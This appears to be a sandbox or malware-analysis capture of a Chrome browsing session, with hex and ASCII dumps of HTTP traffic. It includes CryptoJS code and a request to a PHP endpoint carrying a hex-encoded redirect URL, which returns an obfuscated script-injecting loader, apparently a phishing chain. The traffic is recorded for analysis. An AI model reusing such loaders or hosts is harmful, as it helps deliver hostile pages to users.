                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ArtSiP9bdM6FmTq0ZS6t1bzuHLqq%2B0uK79iy4qvBWOfW4ZUDzlPeH9WU9nsZYT7xA5%2FDjldpFTqc1nYJfCdGw1P07BMat0hwt37thz3HMDfiUpIYPqLbM%2FeiYK8rSoqnNiu5t6tp"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                    Strict-Transport-Security: max-age=15780000
                                                    Server: cloudflare
                                                    CF-RAY: 8e83ca468d3a4340-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:44:27 UTC411INData Raw: 37 62 65 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                    Data Ascii: 7beb!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                    Data Ascii: window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69
                                                    Data Ascii: ;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:functi
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73
                                                    Data Ascii: )),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProces
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31
                                                    Data Ascii: =i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b
                                                    Data Ascii: [4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32
                                                    Data Ascii: %4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42949672
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d
                                                    Data Ascii: S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f
                                                    Data Ascii: e.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29
                                                    Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.44978469.49.245.1724432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:27 UTC422OUTGET /res444.php?2-68747470733a2f2f4e4c2e6e73696369756d62652e636f6d2f615871725148742f-moray HTTP/1.1
                                                    Host: choicesff.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:27 UTC196INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:26 GMT
                                                    Server: Apache
                                                    Access-Control-Allow-Origin: *
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/javascript;charset=UTF-8
                                                    2024-11-25 18:44:27 UTC1971INData Raw: 37 61 37 0d 0a 20 20 20 20 76 61 72 20 56 59 4e 46 63 57 74 73 55 71 6d 45 50 77 57 6a 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 56 59 4e 46 63 57 74 73 55 71 6d 45 50 77 57 6a 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 56 59 4e 46 63 57 74 73 55 71 6d 45 50 77 57 6a 29 3b 0d 0a 56 59 4e 46 63 57 74 73 55 71 6d 45 50 77 57 6a 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                    Data Ascii: 7a7 var VYNFcWtsUqmEPwWj = document.createElement("script");VYNFcWtsUqmEPwWj.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(VYNFcWtsUqmEPwWj);VYNFcWtsUqmEPwWj.onload=function()


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.449785172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:27 UTC1078OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js? HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cookie: cf_clearance=BykMC4YVH19jXVBD1vZm_9dQq__54HBoZInYarys1tM-1732560228-1.2.1.1-SFtIe0bMWScEvSPqnkxQ9E8TfXhK1qVPtqTCFRD7UKzmNiXsi6b7zwASMAfKIyJJzNrV2eKhtFw0WkBBGpnA6kpowXeCGzifYCUBGUO1BLeVeipwColDmbh_x83xSRMnpWErKrRqP.QtunH5HTfp_GPZQCmI2ypHTAqmSimygPgztnyf_VCKTT4LzeeM9wmWDiRuzkKS9Up0uKXyaxdl45QIn9wGxexqWGaW1LdpCDfURSY6y6n1AHu_DjerAtiEtA1ivgH.qZACFjMMf6CbN7qYGdX8JRGEhHFenSnNxJR6KcSyqSSUKf6F2_zXZvrDIbNF_mJVWeg.iv7Jid4jtzoHeZpVDUqz4sS2W_n6gxG4PLZvkLM.Z3dbEfxD2kBvmbtJPIgiDjzdQ8L2zO_tTA6HkV3bRdJpz8jeL2vopAHjxm3oevaGarg_rMzwsTLs
                                                    2024-11-25 18:44:27 UTC877INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:27 GMT
                                                    Content-Type: application/javascript; charset=UTF-8
                                                    Content-Length: 8016
                                                    Connection: close
                                                    cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                    x-content-type-options: nosniff
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xyifoI35i%2FMJzlipwl%2FxusHBjg2%2BqvOlnGIX%2Bba20MeoFKI90K%2FbtfKZq3i%2BwaJVe9%2BdFyCFH8%2FD5FUH7Ij8YJTyFni80eprsSggv5cpQwS8c2zSGBRfNbNopSqqvi3wKYM%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e83ca47bc01425c-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1707&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1656&delivery_rate=1665715&cwnd=226&unsent_bytes=0&cid=c5c63fbe90d7b9f8&ts=475&x=0"
                                                    2024-11-25 18:44:27 UTC492INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 68 2c 69 2c 6a 2c 6b 2c 6f 2c 73 2c 78 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 55 2c 66 2c 67 29 7b 66 6f 72 28 55 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 2d 70 61 72 73 65 49 6e 74 28 55 28 35 37 34 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 55 28 35 33 30 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 35 32 32 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 39 36 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 55 28 35 39 35 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 35 38 35 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 55 28 35 38 33 29 29 2f 37 2c 67 3d 3d 3d 65 29 62
                                                    Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,j,k,o,s,x){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=-parseInt(U(574))/1+parseInt(U(530))/2+-parseInt(U(522))/3+-parseInt(U(496))/4+parseInt(U(595))/5+-parseInt(U(585))/6+parseInt(U(583))/7,g===e)b
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 4c 2c 4d 29 7b 69 66 28 61 30 3d 56 2c 6e 75 6c 6c 3d 3d 3d 44 7c 7c 76 6f 69 64 20 30 3d 3d 3d 44 29 72 65 74 75 72 6e 20 46 3b 66 6f 72 28 48 3d 6e 28 44 29 2c 67 5b 61 30 28 35 34 37 29 5d 5b 61 30 28 35 31 39 29 5d 26 26 28 48 3d 48 5b 61 30 28 35 31 30 29 5d 28 67 5b 61 30 28 35 34 37 29 5d 5b 61 30 28 35 31 39 29 5d 28 44 29 29 29 2c 48 3d 67 5b 61 30 28 35 34 30 29 5d 5b 61 30 28 35 34 38 29 5d 26 26 67 5b 61 30 28 34 39 37 29 5d 3f 67 5b 61 30 28 35 34 30 29 5d 5b 61 30 28 35 34 38 29 5d 28 6e 65 77 20 67 5b 28 61 30 28 34 39 37 29 29 5d 28 48 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4e 2c 61 31 2c 4f 29 7b 66 6f 72 28 61 31 3d 61 30 2c 4e 5b 61 31 28 35 38 30 29 5d 28 29 2c 4f 3d 30 3b 4f 3c 4e 5b 61 31 28 35 38 31 29 5d 3b 4e 5b 4f 2b 31 5d 3d 3d 3d
                                                    Data Ascii: L,M){if(a0=V,null===D||void 0===D)return F;for(H=n(D),g[a0(547)][a0(519)]&&(H=H[a0(510)](g[a0(547)][a0(519)](D))),H=g[a0(540)][a0(548)]&&g[a0(497)]?g[a0(540)][a0(548)](new g[(a0(497))](H)):function(N,a1,O){for(a1=a0,N[a1(580)](),O=0;O<N[a1(581)];N[O+1]===
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 61 36 28 35 30 39 29 5d 28 30 29 29 7b 66 6f 72 28 47 3d 30 3b 47 3c 4d 3b 4f 3c 3c 3d 31 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 36 28 35 31 36 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 36 28 35 30 39 29 5d 28 30 29 2c 47 3d 30 3b 38 3e 47 3b 4f 3d 54 26 31 7c 4f 3c 3c 31 2e 39 33 2c 45 2d 31 3d 3d 50 3f 28 50 3d 30 2c 4e 5b 61 36 28 35 31 36 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 54 3d 31 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 4f 3c 3c 31 7c 54 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 36 28 35 31 36 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3d 30 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 36 28 35
                                                    Data Ascii: a6(509)](0)){for(G=0;G<M;O<<=1,P==E-1?(P=0,N[a6(516)](F(O)),O=0):P++,G++);for(T=J[a6(509)](0),G=0;8>G;O=T&1|O<<1.93,E-1==P?(P=0,N[a6(516)](F(O)),O=0):P++,T>>=1,G++);}else{for(T=1,G=0;G<M;O=O<<1|T,P==E-1?(P=0,N[a6(516)](F(O)),O=0):P++,T=0,G++);for(T=J[a6(5
                                                    2024-11-25 18:44:27 UTC1369INData Raw: 63 74 69 6f 6e 28 44 2c 45 2c 46 2c 61 39 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 54 2c 53 29 7b 66 6f 72 28 61 39 3d 61 34 2c 47 3d 5b 5d 2c 48 3d 34 2c 49 3d 34 2c 4a 3d 33 2c 4b 3d 5b 5d 2c 4e 3d 46 28 30 29 2c 4f 3d 45 2c 50 3d 31 2c 4c 3d 30 3b 33 3e 4c 3b 47 5b 4c 5d 3d 4c 2c 4c 2b 3d 31 29 3b 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 39 28 34 39 39 29 5d 28 32 2c 32 29 2c 4d 3d 31 3b 4d 21 3d 52 3b 53 3d 4e 26 4f 2c 4f 3e 3e 3d 31 2c 4f 3d 3d 30 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 4d 2a 28 30 3c 53 3f 31 3a 30 29 2c 4d 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 51 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 39 28 34 39 39 29 5d 28 32 2c 38 29 2c 4d 3d 31 3b
                                                    Data Ascii: ction(D,E,F,a9,G,H,I,J,K,L,M,N,O,P,Q,R,T,S){for(a9=a4,G=[],H=4,I=4,J=3,K=[],N=F(0),O=E,P=1,L=0;3>L;G[L]=L,L+=1);for(Q=0,R=Math[a9(499)](2,2),M=1;M!=R;S=N&O,O>>=1,O==0&&(O=E,N=F(P++)),Q|=M*(0<S?1:0),M<<=1);switch(Q){case 0:for(Q=0,R=Math[a9(499)](2,8),M=1;
